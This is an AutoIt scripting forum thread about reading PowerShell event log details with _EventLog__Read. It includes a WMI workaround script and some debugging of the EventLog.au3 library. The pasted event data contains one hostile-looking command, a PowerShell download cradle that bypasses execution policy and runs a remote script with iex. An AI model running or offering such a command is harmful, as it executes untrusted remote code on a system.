Jump to content
Sign in to follow this  
jayinoz

Reading details from the Windows Event Log

Recommended Posts

jayinoz

Hi folks,

I'm looking to read detailed information from the Windows PowerShell event log.

I can get system information, using the sample script (from https://www.autoitscript.com/autoit3/docs/libfunctions/_EventLog__Read.htm), e.g.

Result ............: True
Record number .....: 2148
Submitted .........: 10/23/2017 10:14:40 PM
Generated .........: 10/23/2017 10:14:40 PM
Event ID ..........: 403
Type ..............: Information
Category ..........: 4
Source ............: PowerShell
Computer ..........: XXXX.YYYY.com
Username ..........:

But what I'm not able to get is the Event Data, e.g.

Stopped
Available
NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.14393.1532 HostId=41e45e12-e143-4e82-9882-4df8547b61ba HostApplication=powershell.exe -ep Bypass -nop -c iex ((New-Object Net.WebClient).DownloadString('https://test.123.com/file.ps1')) EngineVersion=5.1.14393.1532 RunspaceId=f328f446-0e4f-401a-8d8e-2dd051e45a80 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=

By the look of EventLog.au3, (and I may have got all this wrong):

 $aEvent[14] = __EventLog_DecodeData($tEventLog)

...should contain this data as an array, with $aData[0] set as the length of the array in Func __EventLog_DecodeData.

Using the sample, when I set $f14 = $aEvent[14] and look at $f14[0] I get zero, whereas I think this should contain the length of the array containing event data.

Does anybody know what is gong wrong here?

Thanks,

Jason

Share this post


Link to post
Share on other sites
Jimwright

I recall having issues with the inbuilt event viewer when putting together a quick monitoring programme to send to our clients.  In  a rush I just used the WMI to get the description.  I was just grabbing the last 10 App and System events:

 

$AppEV=_EventLog__Open("", "Application")
$SysEV=_EventLog__Open("", "System")
ReadEV("Application")

Func ReadEV($type)
Local $RV=@crlf&"Last 10 "&$type&" Events" & @crlf
For $i=1 to 10
    if $type='Application' then
Local $Event = _EventLog__Read($AppEV, True, False) ; read last event
Else
    Local $Event = _EventLog__Read($SysEV, True, False) ; read last event
    endif
IF $Event[0]=True then
$RV=$RV&"DateTime: " & $Event[2] & " " & $Event[3] & @crlf & _
"Event Type: " & $Event[8] & @crlf & "EventID: " & $Event[6] & @crlf & _
GetEVDesc($Event[1],$type) & @crlf & dash() & @crlf
Else
   $RV=$Rv & "Failed to read Event Log " & $i & @CRLF
EndIf
next
Return $RV
EndFunc

Func GetEVDesc($No,$Type)
#cs
The inbuilt EV function _EventLog__Read has a bug and doesnt read the full source or description; this
is a workaround using the standard WMI functions
#Ce
Local $strComputer = "."
Local $objWMIService = ObjGet("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & $strComputer & "\root\cimv2")
Local $ColEVM=$objWMIService.ExecQuery _
    ("Select * From Win32_NTLogEvent Where Logfile = '"&$Type&"' AND " & _
        "RecordNumber = " & $No)
for $objI in $colEvm
   $rv="Event Source: "& $objI.sourcename & @crlf & "Event Description: "&$objI.message
   return $rv
Next
EndFunc

 

  • Like 1

Share this post


Link to post
Share on other sites
gruntydatsun

$aEvent[14] is showing as an 1d array with one element containing 0 on my machine at work too. 

I stepped through it a bit and found this is the first point where things start to go pear shaped.

 

EventLog.au3

Function:
Func __EventLog_DecodeData($tEventLog)
Line:

Local $iLength = DllStructGetData($tEventLog, "DataLength")

This line is the first time it appears to fall over.  DllStructGetData is returning zero which is listed as the return value for a failure but its not setting the @error macro (still at 0)?? 

then line:
 

Local $tBuffer = DllStructCreate("byte[" & $iLength & "]", $pEventLog + $iOffset)

errors out reporting "there is an unknown data type in the string passed"

 

 Perhaps someone smarter knows whats up?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×